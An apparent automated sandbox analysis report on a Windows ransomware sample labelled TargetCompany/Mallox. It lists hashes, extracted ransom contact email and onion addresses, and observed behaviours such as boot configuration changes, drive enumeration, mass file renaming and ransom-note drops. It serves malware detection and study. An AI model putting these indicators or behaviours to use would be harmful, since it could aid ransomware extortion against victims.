Analysis
-
max time kernel
134s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
20/03/2024, 10:48 UTC
Static task
static1
Behavioral task
behavioral1
Sample
7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe
Resource
win10v2004-20240226-en
General
-
Target
7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe
-
Size
6.0MB
-
MD5
66946f4914dff619a1c4bae465d35fa0
-
SHA1
3642996044cd85381b19f28a9ab6763e2bab653c
-
SHA256
7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a
-
SHA512
de28c9cce7b4919c710391a525fc1c6a3b391c6b4b03b2b0dad01e42387625fc70a895bd909333d5bf6f5d49f66cadcc2ec630aa02cc94e4c0333c97cbbe8cc6
-
SSDEEP
98304:9caoZQU7LgG4PwVIsWE61NQq7vW+WHTemGoMF:9c1uUwfHNQqYTemGoMF
Malware Config
Extracted
\Device\HarddiskVolume1\HOW TO BACK FILES.txt
targetcompany
decryption@mallox.homes
http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin
http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion
Signatures
-
TargetCompany,Mallox
TargetCompany (aka Mallox) is a ransomware which encrypts files using a combination of ChaCha20, AES-128, and Curve25519, first seen in June 2021.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 116 bcdedit.exe 2252 bcdedit.exe -
Renames multiple (6509) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\H: 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened (read-only) \??\L: 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened (read-only) \??\P: 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened (read-only) \??\S: 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened (read-only) \??\U: 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened (read-only) \??\V: 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened (read-only) \??\Y: 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened (read-only) \??\G: 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened (read-only) \??\Z: 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened (read-only) \??\Q: 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened (read-only) \??\R: 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened (read-only) \??\K: 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened (read-only) \??\I: 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened (read-only) \??\J: 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened (read-only) \??\M: 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened (read-only) \??\N: 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened (read-only) \??\T: 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened (read-only) \??\W: 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened (read-only) \??\X: 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened (read-only) \??\E: 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened (read-only) \??\A: 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened (read-only) \??\B: 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened (read-only) \??\O: 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened (read-only) \??\D: 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 api.ipify.org -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.513.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File created C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\notetagsUI\HOW TO BACK FILES.txt 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-ma\HOW TO BACK FILES.txt 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\NewComment@2x.png 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\SplashScreen.scale-100.png 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxManifest.xml 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\notetagsUI\main.js 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-36_altform-lightunplated.png 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\chrome-ext-2x.png 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\sv-se\HOW TO BACK FILES.txt 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProXC2RVL_KMS_ClientC2R-ul.xrm-ms 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\WinFXList.xml 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\HOW TO BACK FILES.txt 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\ODBC\HOW TO BACK FILES.txt 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sr\HOW TO BACK FILES.txt 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\vlc.mo 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\MixedRealityPortalAppList.targetsize-72_altform-lightunplated.png 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\FetchingMail.scale-150.png 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-96_altform-unplated_contrast-black.png 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\HOW TO BACK FILES.txt 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\eu-es\HOW TO BACK FILES.txt 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-gb\HOW TO BACK FILES.txt 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\HOW TO BACK FILES.txt 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\LTR\contrast-white\MedTile.scale-125.png 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\166.png 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-24_altform-unplated.png 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\GenericMailMediumTile.scale-200.png 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_closereview_18.svg 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\images\avatar.jpg 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\lv-LV\View3d\3DViewerProductDescription-universal.xml 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_Dtmf_4.m4a 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\HOW TO BACK FILES.txt 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\LargeLogo.scale-125_contrast-white.png 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailMediumTile.scale-200.png 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-ma\ui-strings.js 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.185.17\EdgeUpdate.dat 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\lcms.md 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-white_scale-200.png 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-80_contrast-white.png 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\dot_2x.png 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jfr\HOW TO BACK FILES.txt 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\HOW TO BACK FILES.txt 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Weather_TileWide.scale-200.png 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageSplashScreen.scale-200.png 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\SplashScreen.scale-125.png 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ja-jp\ui-strings.js 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\da-dk\ui-strings.js 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sk-sk\HOW TO BACK FILES.txt 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\uk-ua\HOW TO BACK FILES.txt 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSansBold.ttf 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\LTR\contrast-white\MedTile.scale-125.png 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\Assets\logo.scale-200_contrast-black.png 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxIdentityProvider_12.50.6001.0_x64__8wekyb3d8bbwe\XboxIdp.Native.winmd 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluCCFilesEmpty_180x180.svg 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\HOW TO BACK FILES.txt 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\SpotlightCalendar_2017-03.gif 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\RTL\contrast-white\HOW TO BACK FILES.txt 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Office Setup Controller\HOW TO BACK FILES.txt 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\HOW TO BACK FILES.txt 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\hr-hr\HOW TO BACK FILES.txt 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Viewpoints\Dark\Cabinet.png 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\export.svg 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files\7-Zip\Lang\fr.txt 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\es-es\HOW TO BACK FILES.txt 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeDebugPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 